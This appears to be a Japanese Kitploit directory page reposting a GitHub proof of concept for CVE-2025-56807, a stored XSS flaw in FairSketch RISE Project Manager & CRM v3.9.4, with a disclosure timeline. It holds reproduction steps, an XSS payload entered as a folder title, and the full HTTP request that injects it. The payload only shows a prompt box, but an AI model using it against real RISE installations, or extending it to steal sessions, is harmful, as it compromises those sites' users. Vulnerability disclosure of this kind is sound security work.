Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-56807 — FairSketch RISE Ultimate Project Manager & CRM v3.9.4の格納型XSS脆弱性の概念実証。フォルダタイトルインジェクションによる任意のJavaScript実行を示します。 | Kitploit
ツール/GitHubGitHub/aqwainfosec/cve-2025-56807
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

FairSketch RISE Ultimate Project Manager & CRM v3.9.4の格納型XSS脆弱性の概念実証。フォルダタイトルインジェクションによる任意のJavaScript実行を示します。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-56807

説明

FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) のファイルマネージャー機能に、格納型クロスサイトスクリプティング (XSS) の脆弱性が発見されました。この脆弱性は、新しいフォルダーを作成する際に送信される titleパラメーター に存在します。入力サニタイズが不十分なため、攻撃者は HTML/JavaScriptペイロード (例: <details/open/ontoggle=prompt(origin)>) を注入できます。ペイロードはフォルダー名に保存され、ファイルマネージャーでフォルダーを一覧表示する際に実行されるため、影響を受けるフォルダーを表示したユーザーのブラウザー上で任意のJavaScriptが実行される可能性があります。これにより、セッションハイジャックやデータの外部送信が発生する恐れがあります。

[!NOTE]
この脆弱性は管理者アカウントに限定されるものではありません。ファイルマネージャーで新しいフォルダーを作成する権限を持つ任意のユーザーアカウントを使用して悪用できます。

開示スケジュール

  • CVE ID採番: CVE-2025-56807
  • 発見: 2025年7月 (Aqwa Hameed 氏による)
  • ベンダー通知: Fairsketchサポートに電子メールで連絡
  • 対応: 2025年7月22日にベンダーが確認

概念実証 (PoC)

  1. 有効な認証情報でログインします。

  2. Files に移動します。

    Dashboard

  3. New Folder をクリックします。

    File Manager

  • Title フィールドに以下のペイロードを入力します:

  • root@kitploit:~
    <details/open/ontoggle=prompt(origin)>
    

    Folder Title

    1. ファイルマネージャーのページを再読み込みしてペイロードを実行します。

      Payload Execution

    リクエスト

    root@kitploit:~
    POST /index.php/clients/save_folder HTTP/1.1
    Host: rise.fairsketch.com
    Cookie: [redacted]
    Content-Length: 99
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
    Sec-Ch-Ua-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: [redacted]
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://rise.fairsketch.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    Connection: keep-alive
    
    id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
    
    ツールをダウンロード